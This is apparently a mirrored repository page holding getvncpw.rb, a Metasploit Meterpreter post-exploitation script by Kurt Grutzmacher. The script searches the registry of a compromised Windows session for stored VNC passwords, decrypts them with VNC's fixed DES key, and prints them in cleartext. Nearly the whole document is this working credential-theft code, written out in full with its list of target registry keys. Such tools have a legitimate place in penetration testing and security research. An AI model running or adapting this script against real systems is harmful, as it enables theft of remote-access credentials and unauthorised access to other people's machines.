Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

getvncpw.rb 3.1KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #----------------------------------------------------------------
  7. # Meterpreter script to obtain the VNC password out of the
  8. # registry and print its decoded cleartext
  9. #
  10. # by Kurt Grutzmacher <grutz@jingojango.net>
  11. #
  12. # rev history
  13. # -----------
  14. # 1.0 - 9/24/9 - Initial release
  15. #----------------------------------------------------------------
  16. require 'rex/proto/rfb/cipher'
  17. session = client
  18. @@exec_opts = Rex::Parser::Arguments.new(
  19. "-h" => [ false, "Help menu."],
  20. "-k" => [ true, "Specific registry key to search (minus Password)."],
  21. "-l" => [ false, "List default key locations"]
  22. )
  23. def usage()
  24. print("\nPull the VNC Password from a Windows Meterpreter session\n")
  25. print("By default an internal list of keys will be searched.\n\n")
  26. print("\t-k\tSpecific key to search (e.g. HKLM\\\\Software\\\\ORL\\\\WinVNC3\\\\Default)\n")
  27. print("\t-l\tList default key locations\n\n")
  28. completed
  29. end
  30. def get_vncpw(session, key)
  31. root_key, base_key = session.sys.registry.splitkey(key)
  32. open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
  33. begin
  34. return open_key.query_value('Password')
  35. rescue
  36. # no registry key found or other error
  37. return nil
  38. end
  39. end
  40. def listkeylocations(keys)
  41. print_line("\nVNC Registry Key Locations")
  42. print_line("--------------------------\n")
  43. keys.each { |key|
  44. print_line("\t#{key}")
  45. }
  46. completed
  47. end
  48. # fixed des key
  49. fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
  50. # 5A B2 CD C0 BA DC AF 13
  51. # some common places for VNC password hashes
  52. keys = [
  53. 'HKLM\\Software\\ORL\\WinVNC3', 'HKCU\\Software\\ORL\\WinVNC3',
  54. 'HKLM\\Software\\ORL\\WinVNC3\\Default', 'HKCU\\Software\\ORL\\WinVNC3\\Default',
  55. 'HKLM\\Software\\ORL\\WinVNC\\Default', 'HKCU\\Software\\ORL\\WinVNC\\Default',
  56. 'HKLM\\Software\\RealVNC\\WinVNC4', 'HKCU\\Software\\RealVNC\\WinVNC4',
  57. 'HKLM\\Software\\RealVNC\\Default', 'HKCU\\Software\\RealVNC\\Default',
  58. ]
  59. # parse the command line
  60. listkeylocs = false
  61. keytosearch = nil
  62. @@exec_opts.parse(args) { |opt, idx, val|
  63. case opt
  64. when "-h"
  65. usage
  66. when "-l"
  67. listkeylocations(keys)
  68. when "-k"
  69. keytosearch = val
  70. end
  71. }
  72. if client.platform == 'windows'
  73. if keytosearch == nil
  74. print_status("Searching for VNC Passwords in the registry....")
  75. keys.each { |key|
  76. vncpw = get_vncpw(session, key)
  77. if vncpw
  78. vncpw_hextext = vncpw.data.unpack("H*").to_s
  79. vncpw_text = Rex::Proto::RFB::Cipher.decrypt vncpw.data, fixedkey
  80. print_status("FOUND in #{key} -=> #{vncpw_hextext} => #{vncpw_text}")
  81. end
  82. }
  83. else
  84. print_status("Searching in regkey: #{keytosearch}")
  85. vncpw = get_vncpw(session, keytosearch)
  86. if vncpw
  87. vncpw_hextext = vncpw.data.unpack("H*").to_s
  88. vncpw_text = Rex::Proto::RFB::Cipher.decrypt vncpw.data, fixedkey
  89. print_status("FOUND in #{keytosearch} -=> #{vncpw_hextext} => #{vncpw_text}")
  90. else
  91. print_status("Not found")
  92. end
  93. end
  94. else
  95. print_error("This version of Meterpreter is not supported with this Script!")
  96. raise Rex::Script::Completed
  97. end